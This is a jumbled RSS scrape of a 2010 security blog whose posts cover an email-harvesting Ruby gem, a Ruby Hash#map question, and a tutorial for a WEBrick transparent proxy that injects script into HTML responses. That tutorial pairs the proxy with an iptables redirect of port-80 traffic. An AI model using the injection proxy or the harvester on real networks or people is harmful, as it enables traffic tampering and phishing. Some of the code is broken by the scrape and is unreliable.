http://www.freedomcoder.com.ar Information for free-minded geeks Wed, 14 Jul 2010 13:22:53 +0000 http://backend.userland.com/rss092 en http://www.freedomcoder.com.ar/2010/07/14/recommend-this-sitepage-client-side-attack/ http://www.freedomcoder.com.ar/2010/07/11/amazon-users-info-crawler/ http://www.freedomcoder.com.ar/2010/07/09/client-side-penetration-testing-with-esearchy-emaily/ http://www.freedomcoder.com.ar/2010/07/09/strip-binary-executables-in-osx/ http://www.freedomcoder.com.ar/2010/06/13/github-email-crawler/ http://www.freedomcoder.com.ar/2010/05/24/im-a-p1r4t3-now/ http://www.freedomcoder.com.ar/2010/05/17/installing-esearchy-on-backtrack-4-0/ http://www.freedomcoder.com.ar/2010/02/28/where-are-gems-executables-in-ubuntu/ http://www.freedomcoder.com.ar/2010/01/31/another-year-is-in-the-can-welcome-29s/ http://www.freedomcoder.com.ar/2009/11/27/esearchy-ng-work/ http://www.freedomcoder.com.ar/2009/10/21/bugmenot-cli-script-updated/ http://www.freedomcoder.com.ar/2009/09/14/bugmenot-cli-script/ http://www.freedomcoder.com.ar/2009/08/04/new-blog/ Github . In order to install it you simple add the repository and then install the gem, as shown below. > gem sources -a http://gems.github.com > gem install FreedomCoder-esearchy Once the gem is installed, you can create a new search opening and/or use the "esearchy" CLI tool but it's really basic so far and it does not has all of the plugins. require 'esearchy' ESearchy::LOG.level = ESearchy::APP #Output to the stdout. ESearchy.create "domain.com" do |d| d.yahoo_key = "yourAPIkeygoeshere" d.bing_key = "yourAPIkeygoeshere" # if you want to also look in LinkedIn d.company_name "Company Name" #A user is needed in order to search within Linkedin d.linkedin_credentials "myuser@linkedin.com", "mypwd" d.maxhits = 50 d.search d.save_to_file "company_emails.txt" end If you have any comments, issues or want to submit a bug please do so on http://github.com/FreedomCoder/esearchy/issues Hopefully it will be useful to you. :) ]]> http://www.freedomcoder.com.ar/2009/07/13/first-stable-beta-of-esearchy-is-out/ Use it at your own discretion and listen to your ghost ...]]> http://www.freedomcoder.com.ar/2009/07/10/random-user-agents/ Esearchy.create "domain.com" do |domain| domain.maxhits = 500 domain.search domain.clean {|e| e =~ /<|>/ } domain.save_to_file "~/emails.txt" end and the more classic way in which users can create an Esearchy objetc and work on it domain = Esearchy.new :query => "domain.com", :maxhits => 500 domain.search domain.save_to_file "~/emails.txt" For now , that's it for now , but keep on tuned for more shitty code ajjajaa ]]> http://www.freedomcoder.com.ar/2009/07/05/im-back-with-some-code-/ ]]> http://www.freedomcoder.com.ar/2009/04/01/im-going-loco-on-friday-/ irb(main):002:0> {:a => 1, :b => 2}.map do |k,v| v+2 end => [3, 4] When I try to map a Hash I get in return an Array. Shoulnd't I get a Hash??? It's that the idea of "mapping" ? I tried in both 1.8 and 1.9.1 and both returned the same. I guess I'm either missing something or map is not implemented as it should be. Help please!!, Anyone ? UPDATE: Well, I think this is an explanation (extracted from the RDoc) : enum.collect {| obj | block } => array enum.map {| obj | block } => array Returns a new array with the results of running block once for every element in enum. (1..4).collect {|i| i*i } #=> [1, 4, 9, 16] (1..4).collect { "cat" } #=> ["cat", "cat", "cat", "cat"] ]]> http://www.freedomcoder.com.ar/2009/03/19/hashmap-is-not-working-/ NOTE: As a word of advice, it is worth mentioning that this situation where only the Japanese have ruby code, has happened several times before with weird and undocumented methods or libraries. So it's always good to look in google.jp for ruby code ;) You may say why to even bother to do a Transparent proxy in ruby which is able to inject code, well maybe the answer is just because I want to see if I can do it. I decided to do my PoC with the native library WEBrick, a simple and light HTTPserver among other things.
Simple Proxy : The first thing I usually do is check the official site and Rdoc for the lib. Unluckily, I was only able to find how to do a normal proxy. and work with the request. require 'webrick' require 'webrick/httproxy' WEBrick::HTTPProxyServer.new :Port 8080, :BindAddress => '0.0.0.0', :ServerType => Thread, :RequestCallback => Proc.new {|req,res| puts "#{req.unparsed_uri}" } a.start Simple Proxy server.
Fixing the URI : With this we can setup Firefox, safari or any other web browser to use the proxy on localhost:8080 and Eureka, we have a proxy that will printout the unparsed_uri for our request. This in theory works like a charm , but wait. If you see the request Firefox is doing the following GET http://www.sarasa.com/ HTTP/1.1 ... Browser request using a proxy server. Normal the brower when requesting a page , will use HTTP/1.1 and use the header "Host" to specified the url and just connect using a: GET / HTTP/1.1 Host: www.sarasa.com Browser request. Having said this, here is the first wall I encounter. This is something that was undocumented: how do we turn our proxy into a transparent proxy? The answer is simple. let's modified our code and change the request. All the information is there we just have to re-write it to fit our need. Before, we start we should know that our req is of type WEBrick::HTTPRequest. Knowing this we will do a little monkey patching to add a new method to the class and require 'webrick' require 'webrick/httproxy' class WEBrick::HTTPRequest def update_uri(uri) @unparsed_uri = uri @request_uri = parse_uri(uri) end end req_call = Proc.new do |req,res| req.update_uri() puts "#{req.unparsed_uri}" } end WEBrick::HTTPProxyServer.new :Port 8080, :BindAddress => '0.0.0.0', :ServerType => Thread, :RequestCallback => req_call a.start Transparent Proxy Server.
Injecting: Well, a transparent proxy is cool , but we could do the same with squid or some other product. Let's take it a little further and make it more interesting by adding an inject_payload to our response class. require 'webrick' require 'webrick/httproxy' class WEBrick::HTTPRequest def update_uri(uri) @unparsed_uri = uri @request_uri = parse_uri(uri) end end class WEBrick::HTTPResponse def inject_payload(string) if @content_type =~ /html/ @body.gsub!( /<\/body>/ , "") # this is just end end end req_call = Proc.new do |req,res| req.update_uri() puts "#{req.unparsed_uri}" } end res_call = Proc.new do |req,res| res.inject_payload("alert(\"P0wned\");") end WEBrick::HTTPProxyServer.new :Port 8080, :BindAddress => '0.0.0.0', :ServerType => Thread, :RequestCallback => req_call :ProxyContentHandler => res_call a.start Injectable Transparent Proxy server. Last but not least : Well, there is one more thing , but this is more at an operating system level we know want to reroute everything that is coming from the port 80 to port 8080 where our transparent proxy is listening. The following example shows a possible way to redirect HTTP traffic assuming that is coming from the interface eth0 and the proxy is listening on port 8080. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 Now we have a transparent proxy in our hands capable of injecting code into their request. Enjoy. ]]> http://www.freedomcoder.com.ar/2009/02/28/webrick-transparent-proxy-code-injection/ def create_pdf(list,name=nil) require 'prawn' require 'prawn/layout' Prawn::Document.generate(name || "output.pdf") do data = [] list.each do |k,v| data << [k,(v.map { |k| k + "\n" }.to_s).strip] end table data, :position => :center, :headers => ["Port", "IP Adresses"], :header_color => "0046f9", :row_colors => :pdf_writer, #["ffffff","ffff00"], :font_size => 10, :vertical_padding => 2, :horizontal_padding => 5 end end Para bajar la ultima versi?n del repositorio Git : http://github.com/FreedomCoder/nmapports/tree/master]]> http://www.freedomcoder.com.ar/2009/02/16/nmaports-03-now-with-pdf-support/